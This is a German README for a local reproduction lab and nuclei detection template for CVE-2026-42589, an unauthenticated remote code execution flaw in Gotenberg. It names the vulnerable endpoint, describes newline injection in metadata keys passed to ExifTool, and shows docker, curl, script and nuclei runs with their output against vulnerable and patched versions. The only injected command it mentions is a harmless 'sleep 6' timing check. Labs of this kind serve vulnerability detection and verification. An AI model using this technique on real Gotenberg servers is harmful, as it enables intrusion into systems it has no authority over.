
POC_CVE-2026-42589
Lokales Reproduktionslabor und nuclei-Template-Entwurf für CVE-2026-42589, das Gotenberg betrifft.
CVE-2026-42589 ist ein nicht authentifiziertes Problem mit Remote-Codeausführung in Gotenberg, das durch Newline-Injection in Metadaten-Schlüsseln verursacht wird:
POST /forms/pdfengines/metadata/write
Betroffene Gotenberg-Versionen leiten benutzerkontrollierte Metadaten-Schlüssel ohne Zurückweisung von Steuerzeichen an ExifTool weiter. Ein Metadaten-Schlüssel, der JSON-escapte Newlines enthält, kann in zusätzliche ExifTool-Argumente aufgeteilt werden.
Dieses Labor wurde verwendet, um Folgendes zu validieren:
gotenberg/gotenberg:8.29.1gotenberg/gotenberg:8.31.0Das nuclei-Template verwendet nur einen nicht-destruktiven sleep 6-Timing-Check.
docker-compose.ymldocker-compose.latest.ymlCVE-2026-42589.yamlmanual_verify.pysample.pdfREADME.mdGotenberg 8.29.1 starten:
docker compose down -v
docker compose up -d
docker compose logs --tail=100 gotenberg
Version prüfen:
curl -s http://127.0.0.1:3000/version
Manueller Raw-Multipart-Timing-Check:
python3 manual_verify.py http://127.0.0.1:3000
Erwartetes Verwundbarkeits-Signal:
HTTP/1.1 500 Internal Server Error
TOTAL_TIME=6.xs
Beobachtetes Verwundbarkeits-Ergebnis:
HTTP/1.1 500 Internal Server Error
TOTAL_TIME=6.300s
Internal Server Error
Gotenberg 8.31.0 starten:
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 gotenberg
Version prüfen:
curl -s http://127.0.0.1:3000/version
Denselben manuellen Timing-Check ausführen:
python3 manual_verify.py http://127.0.0.1:3000
Beobachtetes Ergebnis der gepatchten Version:
HTTP/1.1 400 Bad Request
TOTAL_TIME=0.145s
At least one PDF engine cannot process the requested metadata, while others may have failed to convert due to different issues
Template validieren:
nuclei -duc -validate -t CVE-2026-42589.yaml
Gegen das verwundbare Ziel ausführen:
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2026-42589.yaml
Erwartetes Verhalten:
8.29.1: Treffer nach der verzögerten 500-Antwort8.31.0: kein TrefferBeobachtetes Verwundbarkeits-Ergebnis:
[CVE-2026-42589] [http] [critical] http://127.0.0.1:3000/forms/pdfengines/metadata/write
[INF] Scan completed in 6.245907708s. 1 matches found.
Beobachtetes Ergebnis der gepatchten Version:
[INF] Scan completed in 93.01425ms. No results found.